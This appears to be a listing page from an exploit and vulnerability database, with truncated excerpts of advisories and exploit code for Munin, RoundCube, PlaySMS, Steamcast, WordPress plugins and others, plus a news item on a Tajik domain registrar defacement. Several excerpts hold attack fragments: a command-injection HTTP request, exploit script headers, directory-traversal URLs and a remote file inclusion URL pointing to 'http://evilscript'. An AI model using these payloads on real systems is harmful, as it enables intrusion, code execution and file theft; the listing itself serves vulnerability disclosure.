Tajikistan Domain Registrar hacked; Google, Yahoo, Twitter, Amazon also defaced

Google’s primary search domain for Tajikistan had seemingly been hacked yesterday, along with other high profile domains including Yahoo, Twitter, Amazon -- redirected to a defaced page. Actually neither Google, nor Twitter servers have been hacked, rather website of Tajikistan's Domain registrar...

Xemra Botnet Remote Code Execution

Exploit for php platform in category remote exploits Exploit Title: Xemra Botnet Remote Code Execution Vulnerability Date: 13.12.2013 Exploit Author: GalaxyAndroid Vendor Homepage: unkn0wn Software Link: http://www.hackreports.com/2012/07/download-zemra-botnet-ddos-attack.html Version: unknown...

TP-Link TL-WR740N / TL-WR740ND 150M Wireless Lite N Router - HTTP Denial of Service

Exploit title: 150M Wireless Lite N Router HTTP DoS Date: 28.11.2013 Exploit Author: Dino Causevic Hardware Link: http://www.tp-link.com/en/products/details/?model=TL-WR740N Vendor Homepage: http://www.tp-link.com/ Contact: dincaus packetstormsecurity.com CVE: Firmware Version: 3.12.11 Build 1203...

Munin 2.0~rc4-1 - Remote Command Injection

source: https://www.securityfocus.com/bid/53032/info Munin is prone to a remote command-injection vulnerability. Attackers can exploit this issue to inject and execute arbitrary commands in the context of the application. printf 'GET /cgi-bin/munin-cgi-graph/%%0afoo%%0a/x/x-x.png HTTP/1.0\r\nHost...

WordPress Theme Tuner Plugin 'tt-abspath' Parameter Remote File Inclusion Vulnerability

WordPress is prone to a remote file inclusion vulnerability. SPDX-FileCopyrightText: 2012 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only CPE = "cpe:/a:wordpress:wordpress"...

2Wire Password Reset

require 'msf/core' class Metasploit3 '2Wire Password Reset', 'Version' = '$Revision: 1 $', 'Description' = %Q This module will reset the admin password on a 2wire wireless router. This works by using a setup wizard page that fails to check if a user is authenicated and doesn't remove or block aft...

CollabNet Subversion Edge Log Parser - HTML Injection

source: https://www.securityfocus.com/bid/43378/info CollabNet Subversion Edge is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. Attacker-supplied HTML and script code would run in the context of...

68designs 68kb Multiple RFI Vulnerabilities (Aug 2010) - Active Check

68designs 68kb is prone to multiple remote file include RFI vulnerabilities because it fails to sufficiently sanitize user-supplied data. SPDX-FileCopyrightText: 2010 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right...

NPDS REvolution Blind SQL Injection

Vulnerability ID: HTB22364 Reference: http://www.htbridge.ch/advisory/blindsqlinjectionvulnerabilityinNPDSREvolution.html Product: NPDS REvolution Vendor: NPDS Vulnerable Version: REvolution 10.02 and Probably Prior Versions Vendor Notification: 29 April 2010 Vulnerability Type: Blind SQL Injecti...

KimsQ 040109 Remote File Inclusion

\|/// \ - - // @ @ ----oOOo---oOOo-------------------------------------------------- KimsQ 040109 Multiple Remote File Include Vulnerability Script: http://kimsq.googlecode.com/files/kimsqv040109.zip Author: mat Mail: [email protected]...

eWebeditor - Directory Traversal

eWebeditor - Directory Traversal Application Info: Name: eWebeditor Version: all version Vulnerability Info: Type: Directory Traversal Risk: Medium Vulnerability: http://site.com/admin/ewebeditor/admin/upload.asp?id=16&dviewmode=&dir =./...

PHP-Fusion Mod avatar_studio LFI

No description provided by source. Tested on: Spanish version By modifying "avatarstudio" parameter at POST data at avatarstudio.php you can retrieve all images at that dir. Also using "avatarselect" you can add yourself a file as avatar which may not be .jpg Proof of concept: POST...

Squito Gallery v.1.0 Cross Site Scripting Vulnerability

Exploit for unknown platform in category web applications ======================================================= Squito Gallery v.1.0 Cross Site Scripting Vulnerability =======================================================...

Steamcast (HTTP Request) Remote Buffer Overflow Exploit (SEH) [1]

No description provided by source. !/usr/bin/python Usage : steamcast.py victimeip Bug : SteamcastHTTP Request Remote Buffer Overflow Exploit SEH 1 Founder : Luigi Auriemma, thx to overflow3r for informing me about the vuln. Tested on : Xp sp2 fr Exploited by : His0k4 Greetings : All friends &...

RoundCube Webmail <= 0.2b Remote Code Execution Exploit

No description provided by source. !/bin/sh I was hoping the PoC would not appear so soon, but now that it is out, i thought i might as well publish my real exploit. Hunger http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5619 FOR LEARNING PURPOSES ONLY! PHP echoiniget'disablefunctions';...

Verity's Search 97查看任意文件漏洞

BUGTRAQ: 162 Verity's Search97是Verity公司搜索引擎的Web访问界面。 Verity's Search97的search97.vts脚本未对用户如入做充分过滤，远程攻击者可能利用此漏洞进行目录遍历攻击，导致系统文件泄漏。 软件包中的search97.vts对用户输入的“..”未做充分过滤，攻击者可能通过构造特殊的请求来读取任何服务器上任何Web服务进程有读权限的文件。 2.1 临时解决方法： 如果您不能立刻安装补丁或者升级，建议您采取以下措施以降低威胁： 暂时停止使用该软件。 厂商补丁： Verity ------...

Words tag script 'index.php' SQL注入漏洞

BUGTRAQ ID: 31011 CNCAN ID：CNCAN-2008090508 Words tag script是一款基于PHP的WEB应用程序。 Words tag script不正确处理用户提交的输入，远程攻击者可以利用漏洞进行SQL注入攻击，可能获得敏感信息或操作数据库。 问题由于'index.php'脚本对用户提交给'word'参数缺少过滤，构建恶意SQL查询作为参数数据，可更改原来的SQL逻辑，获得敏感信息或操作数据库。 Source Workshop Words tag script 1.2 目前没有解决方案提供：...

eSyndiCat 2.2 - register.php Multiple Cross-Site Scripting Vulnerabilities

eSyndiCat 2.2 - register.php Multiple Cross-Site Scripting Vulnerabilities source: https://www.securityfocus.com/bid/30178/info eSyndiCat is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage these issues t...

PlaySMS <= 0.7 SQL Injection Exploit

No description provided by source. !/usr/bin/perl PlaySMS version 0.7 and prior SQL Injection PoC Written by Noam Rathaus of Beyond Security Ltd. use IO::Socket; use strict; my $host = $ARGV0; my $remote = IO::Socket::INET-new Proto = "tcp", PeerAddr = $host, PeerPort = "80" ; unless $remote die...

Ultimate Fun Book 1.02 - 'function.php' Remote File Inclusion

Ultimate Fun Book 1.02 found by:kezzap66345 contant= : download script=http://www.ultimate-fun-board.de dork:Ultimate-Fun-Book 1.02 file: function.php code: ?php require$gbpfad."/config.php"; exploit: http://target/path/function.php?gbpfad=http://evilscript thanx= x0r0n,str0ke,shakia milw0rm.com...